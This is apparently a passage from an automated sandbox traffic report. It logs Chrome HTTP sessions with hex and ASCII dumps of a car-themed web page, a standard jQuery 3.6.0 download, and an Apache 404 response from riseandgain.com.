                                                2024-08-20 13:42:14 UTC1369INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 35 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 65 6e 74 2d 73 65 63 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 34 33 61 34 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 20 30 3b 0d 0a
                                                Data Ascii: padding: 150px 0; text-align: center; } .content-section { padding: 60px 0; } .footer { background: #343a40; color: white; padding: 20px 0;
                                                2024-08-20 13:42:14 UTC1369INData Raw: 70 73 3a 2f 2f 62 65 73 74 63 6f 6d 70 73 2e 63 6f 6d 2e 72 75 2f 23 61 62 6f 75 74 22 3e 41 62 6f 75 74 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 63 6f 6d 70 73 2e 63 6f 6d 2e 72 75 2f 23 73 65 72 76 69 63 65 73 22 3e 53 65 72 76 69 63 65 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74
                                                Data Ascii: ps://bestcomps.com.ru/#about">About</a> </li> <li class="nav-item"> <a class="nav-link" href="https://bestcomps.com.ru/#services">Services</a> </li> <li class="nav-it
                                                2024-08-20 13:42:14 UTC1369INData Raw: 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 20 6f 72 20 63 61 6c 6c 20 75 73 20 61 74 20 35 35 35 2d 37 36 35 2d 36 39 36 33 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 63 6c 61 73 73 3d 22 62 6c 6f 63 6b 71 75 6f 74 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 30 22 3e 44 72 69 76 69 6e 67 20 61 20 72 61 63 65 20 63 61 72 20 69 73 20 6c 69 6b 65 20 64 61 6e 63 69 6e 67 20 77 69 74 68 20 61 20 63 68 61 69 6e 73 61 77 2e 20 2d 20 43 61 6c 65 20 59 61 72 62 6f 72 6f 75 67 68 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 6c 6f 63 6b 71 75 6f 74 65 3e 0d 0a 20 20 20 20 20 20 20 20
                                                Data Ascii: ;protected]</span></a> or call us at 555-765-6963.</p> <blockquote class="blockquote"> <p class="mb-0">Driving a race car is like dancing with a chainsaw. - Cale Yarborough</p> </blockquote>
                                                2024-08-20 13:42:14 UTC1369INData Raw: 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 74 65 78 74 22 3e 45 78 70 6c 6f 72 65 20 74 68 65 20 6c 61 74 65 73 74 20 61 6e 64 20 67 72 65 61 74 65 73 74 20 69 6e 20 73 75 70 65 72 63 61 72 20 74 65 63 68 6e 6f 6c 6f 67 79 2c 20 70 65 72 66 6f 72 6d 61 6e 63 65 2c 20 61 6e 64 20 64 65 73 69 67 6e 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 63 6f 6d 70 73 2e 63 6f 6d 2e 72 75 2f 23 6d 6f 64 65 72 6e 2d 73 75 70 65 72 63 61 72 73 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 52 65 61 64 20 4d 6f 72 65 3c 2f 61 3e 0d 0a 20 20
                                                Data Ascii: /h5> <p class="card-text">Explore the latest and greatest in supercar technology, performance, and design.</p> <a href="https://bestcomps.com.ru/#modern-supercars" class="btn btn-primary">Read More</a>
                                                2024-08-20 13:42:14 UTC690INData Raw: 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 63 6f 6d 70 73 2e 63 6f 6d 2e 72 75 2f 23 74 65 72 6d 73 22 3e 54 65 72 6d 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 63 6f 6d 70 73 2e 63 6f 6d 2e 72 75 2f 23 66 61 71 22 3e 46 41 51 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20
                                                Data Ascii: <li class="list-inline-item"> <a href="https://bestcomps.com.ru/#terms">Terms</a> </li> <li class="list-inline-item"> <a href="https://bestcomps.com.ru/#faq">FAQ</a> </li>
                                                2024-08-20 13:42:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                40192.168.2.1649767151.101.194.1374435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:42:13 UTC621OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                Host: code.jquery.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://riseandgain.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:42:13 UTC611INHTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 89501
                                                Server: nginx
                                                Content-Type: application/javascript; charset=utf-8
                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                ETag: "28feccc0-15d9d"
                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                Via: 1.1 varnish, 1.1 varnish
                                                Accept-Ranges: bytes
                                                Age: 2176890
                                                Date: Tue, 20 Aug 2024 13:42:13 GMT
                                                X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890022-NYC
                                                X-Cache: HIT, HIT
                                                X-Cache-Hits: 55, 0
                                                X-Timer: S1724161334.811088,VS0,VE1
                                                Vary: Accept-Encoding
                                                2024-08-20 13:42:13 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                2024-08-20 13:42:13 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                2024-08-20 13:42:13 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                2024-08-20 13:42:13 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                2024-08-20 13:42:13 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                2024-08-20 13:42:13 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                2024-08-20 13:42:13 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                2024-08-20 13:42:13 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                2024-08-20 13:42:13 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                2024-08-20 13:42:13 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                41192.168.2.1649766162.241.87.1134435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:42:13 UTC576OUTGET /, HTTP/1.1
                                                Host: riseandgain.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://riseandgain.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:42:13 UTC164INHTTP/1.1 404 Not Found
                                                Date: Tue, 20 Aug 2024 13:42:13 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                2024-08-20 13:42:13 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                42192.168.2.1649769151.101.130.1374435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:42:14 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                Host: code.jquery.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:42:14 UTC613INHTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 89501
                                                Server: nginx
                                                Content-Type: application/javascript; charset=utf-8
                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                ETag: "28feccc0-15d9d"
                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                Via: 1.1 varnish, 1.1 varnish
                                                Accept-Ranges: bytes
                                                Age: 2176891
                                                Date: Tue, 20 Aug 2024 13:42:14 GMT
                                                X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740040-EWR
                                                X-Cache: HIT, HIT
                                                X-Cache-Hits: 5889, 0
                                                X-Timer: S1724161335.562923,VS0,VE1
                                                Vary: Accept-Encoding
